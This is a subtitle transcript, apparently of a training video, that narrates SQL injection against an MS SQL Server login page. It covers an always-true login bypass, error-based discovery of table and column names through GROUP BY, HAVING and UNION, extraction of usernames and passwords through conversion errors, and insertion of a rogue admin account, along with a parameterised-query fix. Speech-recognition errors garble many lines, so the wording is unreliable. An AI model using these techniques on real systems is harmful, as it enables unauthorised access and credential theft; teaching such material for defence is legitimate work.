1
00:00:01,240 --> 00:00:10,110
Let's know study a case application a database server is behind this application to log on a user name

2
00:00:10,220 --> 00:00:17,260
for example admin and a password are needed if you submit invalid data.

3
00:00:17,400 --> 00:00:21,060
The application will not log you in.

4
00:00:21,130 --> 00:00:24,060
We don't even know a valid user name for this application.

5
00:00:25,590 --> 00:00:26,820
We can enter.

6
00:00:26,910 --> 00:00:28,050
Q W e.

7
00:00:28,080 --> 00:00:29,960
D as log in as well.

8
00:00:32,470 --> 00:00:35,100
The result would be the same.

9
00:00:35,240 --> 00:00:42,010
There's little chance that this user name is found in the system will now modify a command exactly as

10
00:00:42,010 --> 00:00:44,320
we showed you directly and as well

11
00:00:47,090 --> 00:00:52,790
we need to end this string with an apostrophe insert a condition that is always true and mark the following

12
00:00:52,790 --> 00:00:54,300
part of the string as a comment

13
00:00:57,420 --> 00:00:58,840
this trick comes off.

14
00:01:00,540 --> 00:01:07,340
You can even see that the user name were logged under is quite unusual because it is so simple and doesn't

15
00:01:07,340 --> 00:01:13,220
require modification of a source code as Kule injection is now one of the biggest perils persistent

16
00:01:13,250 --> 00:01:15,280
in Internet and local networks.

17
00:01:20,480 --> 00:01:25,490
Let's come back to the case code as we mentioned before.

18
00:01:25,550 --> 00:01:30,260
String cancan tenacious may be done client side or server side without much difference.

19
00:01:32,410 --> 00:01:34,340
Let's see if this statement is accurate.

20
00:01:36,070 --> 00:01:40,840
We'll create a procedure with the user name as a parameter in the call and a user's password as the

21
00:01:40,840 --> 00:01:45,360
second parameter its values are empty by default.

22
00:01:47,810 --> 00:01:54,720
For whatever reason the developer has created the procedure in this way next will declare a variable

23
00:01:54,720 --> 00:01:58,880
in the procedure body to which will construct an executable statement.

24
00:02:01,190 --> 00:02:08,910
Constructing the statement will enter exactly the same values as before we want a check of a correct

25
00:02:08,930 --> 00:02:16,430
user name parameter has been submitted and if the password is also correct at the end we want to make

26
00:02:16,430 --> 00:02:22,800
the string executable the exact statement is used for this purpose.

27
00:02:22,810 --> 00:02:26,670
Let's create this procedure.

28
00:02:26,710 --> 00:02:32,860
Now let's try to execute it again by maliciously submitting 0 or 1 equals 1 minus minus instead of the

29
00:02:32,860 --> 00:02:34,380
username and password.

30
00:02:35,550 --> 00:02:40,700
The difference here is that we need to submit a different but always an even number of apostrophes.

31
00:02:42,110 --> 00:02:47,040
The single quotes are always inside a procedure body and in the call.

32
00:02:47,070 --> 00:02:50,670
This has to be taken into account.

33
00:02:50,690 --> 00:02:54,450
Let's check the call for the procedure.

34
00:02:54,480 --> 00:02:55,760
Nothing has changed.

35
00:02:57,010 --> 00:03:03,880
Again as a user we can control program execution or the results it returns by submitting simple logical

36
00:03:03,880 --> 00:03:04,980
expressions.

37
00:03:06,380 --> 00:03:12,780
This attack can and should be avoided by for example not joining statement definition with parameters.

38
00:03:15,830 --> 00:03:22,340
In the case of MSM CULE database server a solution is provided by the use of execute as CULE procedures.

39
00:03:22,370 --> 00:03:29,240
Instead of calling a stream the differences with this procedure we have a statement that we want to

40
00:03:29,240 --> 00:03:38,730
execute a definition of parameters and a first and second parameter.

41
00:03:38,830 --> 00:03:41,030
Nothing can be summed up.

42
00:03:41,180 --> 00:03:44,340
Let's try to alter our procedure.

43
00:03:44,500 --> 00:03:47,030
Let's execute it again in the same way.

44
00:03:47,830 --> 00:03:50,180
The operation failed this time.

45
00:03:50,200 --> 00:03:54,120
Now the procedure must be called with two parameters of an expected type.

46
00:03:55,130 --> 00:03:58,010
If they are not supplied the procedure fails.

47
00:03:59,510 --> 00:04:02,600
If the O R one equals one expression it's the parameter.

48
00:04:02,600 --> 00:04:04,500
There would be no problem.

49
00:04:04,700 --> 00:04:12,840
It's a parameter value the school server knows this and doesn't link it in any way to an executed statement.

50
00:04:14,970 --> 00:04:21,000
Symbolists fuel injection can allow an attacker to log on to a database server application without submitting

51
00:04:21,000 --> 00:04:22,290
a log in and the password

52
00:04:25,060 --> 00:04:30,540
you can enter an expression in this place that is always true and at a specified number of single quotes

53
00:04:30,540 --> 00:04:32,460
and double dashes at the end.

54
00:04:32,700 --> 00:04:34,860
As simple as that.

55
00:04:35,020 --> 00:04:38,840
But this attack technique offers a far wider range of possibilities.

56
00:04:40,350 --> 00:04:45,240
Will be now executing statements directly on the side of a database server to see the results of the

57
00:04:45,240 --> 00:04:48,950
attack in real time and give the attack a little speed boost.

58
00:04:50,550 --> 00:04:54,880
We have no control over the code in rows 40 and 42.

59
00:04:54,950 --> 00:05:00,660
It could for example be embedded in an application code.

60
00:05:00,830 --> 00:05:03,740
It's a query that we've already performed two times before

61
00:05:07,370 --> 00:05:15,680
the row we do have control over is row 41 to improve readability double dashes are inserted at the beginning

62
00:05:15,680 --> 00:05:20,770
of row 42 and not at the end of row 41.

63
00:05:20,830 --> 00:05:26,120
Unfortunately in this interface and the end of line marker affects the two dashes.

64
00:05:28,410 --> 00:05:30,280
We can enter only row 41.

65
00:05:30,300 --> 00:05:35,790
Assuming that rows 40 and 42 are already entered.

66
00:05:35,960 --> 00:05:37,640
What does this mean for us.

67
00:05:38,350 --> 00:05:45,410
Firstly we can of course read the contents of the table if an application checking the query involves

68
00:05:45,410 --> 00:05:47,700
assuming that if a statement returns 0.

69
00:05:47,930 --> 00:05:55,770
This means the correct log in and passwords were supplied were logged in as we've seen hack travel.

70
00:05:55,770 --> 00:06:03,860
Does this being more inquisitive we can also try to see if we can obtain some information about the

71
00:06:03,860 --> 00:06:06,230
structure of the database we're connected to.

72
00:06:08,060 --> 00:06:13,100
With this we move to a subject that will systematize later in theory.

73
00:06:13,190 --> 00:06:20,730
This is the so-called blind test fuel injection in this variant of the attack the names of columns and

74
00:06:20,730 --> 00:06:22,810
tables are known.

75
00:06:22,890 --> 00:06:25,680
That can however be sorted by some criteria.

76
00:06:27,770 --> 00:06:37,200
We can for example order it by column for or as it turns out we can't.

77
00:06:37,300 --> 00:06:42,490
If an application allows as Kule injection and also returns users to an error message it's reported

78
00:06:42,490 --> 00:06:47,670
by a database server if one errors made another can be made.

79
00:06:47,680 --> 00:06:53,320
This means that we're able to see that the table its name is still unknown does not have four columns

80
00:06:54,620 --> 00:06:55,940
does it have three columns.

81
00:06:55,940 --> 00:07:05,450
Then since the application reports no error we can assume it does this information can be obviously

82
00:07:05,450 --> 00:07:07,440
obtained in a number of other ways.

83
00:07:08,830 --> 00:07:15,710
Another solution would be for example to add the union select one clause will add 1 to the result of

84
00:07:15,710 --> 00:07:21,840
the query query results must be tables in as well.

85
00:07:21,950 --> 00:07:23,930
They have to be in a tabular format.

86
00:07:25,210 --> 00:07:32,200
There is an equal number of columns in all places in the table rows cannot be shorter or longer.

87
00:07:33,780 --> 00:07:37,950
By looking at in their message you can see that one is not the correct column number

88
00:07:44,590 --> 00:07:46,400
two is not a good number either.

89
00:07:47,810 --> 00:07:54,480
We know already that there are three columns in the table the application will return no error message

90
00:07:54,480 --> 00:07:55,970
in this case.

91
00:07:56,130 --> 00:07:59,420
It's high time to find the names of the three mysterious columns.

92
00:08:00,540 --> 00:08:07,760
Knowing them there will constitute a point of entry to the entire database system.

93
00:08:07,770 --> 00:08:14,500
Let's try to enter the having one equals one expression this logical test is applied to groups and not

94
00:08:14,500 --> 00:08:22,300
to rows grouping comes before selecting something out of a group.

95
00:08:22,340 --> 00:08:24,770
Let's see how the server will react to this query.

96
00:08:26,060 --> 00:08:31,820
Since we wanted to check something that should be grouped the server tells us that the user name column

97
00:08:31,820 --> 00:08:38,150
of the user table is not contained in a list of grouping columns and is not a parameter of an aggregate

98
00:08:38,150 --> 00:08:42,670
function such as some Either this doesn't matter though.

99
00:08:44,050 --> 00:08:50,190
What's vital for us is that we know the names of the table and its column.

100
00:08:50,210 --> 00:08:51,700
What else can be obtained.

101
00:08:52,700 --> 00:08:55,590
We know that there are three columns.

102
00:08:55,620 --> 00:09:01,460
The next step is to obtain the name of another column we'll use the available information.

103
00:09:01,460 --> 00:09:10,030
The error messages to alter the query we admit that we forgot to use the column for grouping.

104
00:09:10,070 --> 00:09:13,130
Let's see what happens after executing the following query.

105
00:09:14,450 --> 00:09:19,330
The server tells us that we forgot to include another column.

106
00:09:19,370 --> 00:09:23,750
Next we execute a query that uses the information we've just received.

107
00:09:24,050 --> 00:09:28,370
The service response is that there is another column that has not been included in the grouping.

108
00:09:29,530 --> 00:09:31,700
Using this information in another query.

109
00:09:31,870 --> 00:09:34,330
No further error messages will be prompted.

110
00:09:36,520 --> 00:09:42,090
At this point the name of the table and the names of all the table columns are found.

111
00:09:42,140 --> 00:09:48,300
We've not even connected to the database this information can be discovered simply by reading error

112
00:09:48,300 --> 00:09:51,770
messages.

113
00:09:51,790 --> 00:09:58,010
Now if we can obtain the column data types this would be quite enough.

114
00:09:58,090 --> 00:10:01,490
Let's give it a try.

115
00:10:01,530 --> 00:10:08,920
We already know the union clause the name of this operator is to combine results of queries.

116
00:10:09,140 --> 00:10:13,260
This time we'll try to sum something that is contained in the User Name column.

117
00:10:13,280 --> 00:10:18,220
What will this produce the user name column cannot be summed up.

118
00:10:18,340 --> 00:10:22,300
Because the data type of the column is var char.

119
00:10:22,320 --> 00:10:25,520
This is precisely the information we wanted to extract.

120
00:10:26,500 --> 00:10:29,650
The password column is likely to be the same so we'll skip it.

121
00:10:30,610 --> 00:10:34,010
We'll check the result of something for the third column.

122
00:10:34,060 --> 00:10:39,630
The result here is the bit data type we have now acquired the name of the table.

123
00:10:39,830 --> 00:10:44,200
The names of the columns and the column data types.

124
00:10:44,290 --> 00:10:47,270
It would also be good to see the contents of a given table.

125
00:10:48,260 --> 00:10:50,210
How can we do this.

126
00:10:50,270 --> 00:10:57,590
We know that there are three columns the data type of the third is bit but it is a quite peculiar data

127
00:10:57,590 --> 00:11:02,210
type that stores a very limited range of values.

128
00:11:02,220 --> 00:11:06,630
It only takes a value of 0 1 or No.

129
00:11:06,820 --> 00:11:14,230
The men user name operation as the third column is admen column of the data type should fill due to

130
00:11:14,250 --> 00:11:21,980
typing compatability individual rows of a table should have the same number of columns and columns should

131
00:11:21,980 --> 00:11:25,840
be the same type in all places.

132
00:11:25,850 --> 00:11:33,860
Let's see what the server will return converting the value march into a bet data type failed.

133
00:11:33,970 --> 00:11:40,000
In this way the name of the first users discovered you can use the same method to discover the password

134
00:11:40,000 --> 00:11:42,060
of the user.

135
00:11:42,130 --> 00:11:45,040
The password is password.

136
00:11:45,100 --> 00:11:48,330
How can you discover the log ins and passwords of other users.

137
00:11:49,630 --> 00:11:54,970
You already know the credentials of one user will use the same trick but this time we don't want to

138
00:11:54,970 --> 00:12:04,780
find the data we already have acquired the next user is Tomic as you can probably imagine obtaining

139
00:12:04,780 --> 00:12:07,840
the password for this user is a mere technicality.

140
00:12:09,200 --> 00:12:13,870
Will take Marchand's password that was provided in an error message and request an X password.

141
00:12:15,950 --> 00:12:19,000
The second password is more secure.

142
00:12:19,070 --> 00:12:22,710
We now know all we need to know.

143
00:12:22,750 --> 00:12:28,300
Perhaps if you wanted to use the company's services again you might like to save time by quit writing.

144
00:12:28,330 --> 00:12:33,650
Our one equals one and similar expressions over and over.

145
00:12:33,700 --> 00:12:40,910
You can add yourself to a user list and since we can execute queries we probably can execute insert

146
00:12:40,910 --> 00:12:42,090
commands as well.

147
00:12:44,050 --> 00:12:48,870
We know the name of the table and the names of the columns in the table.

148
00:12:48,880 --> 00:12:52,370
Now we can insert anything we want there.

149
00:12:52,410 --> 00:12:53,840
Something has happened.

150
00:12:54,060 --> 00:12:57,630
We don't know the details since we're connected through a web interface.

151
00:12:59,120 --> 00:13:03,920
We don't see results as clearly as in this presentation but we can always check if there is a new row

152
00:13:06,170 --> 00:13:08,430
coming back to one of the earlier queries.

153
00:13:08,510 --> 00:13:15,320
It turns out that there's a new row we can log as attacker using the password tour.

154
00:13:15,420 --> 00:13:20,860
We're so fortunate that it seems that we've become an administrator of the system this technique could

155
00:13:20,860 --> 00:13:23,670
also be applied to other ranges of practices.

156
00:13:24,730 --> 00:13:29,580
This will be the introduction of the automated fuel injection attacks that will be covered soon.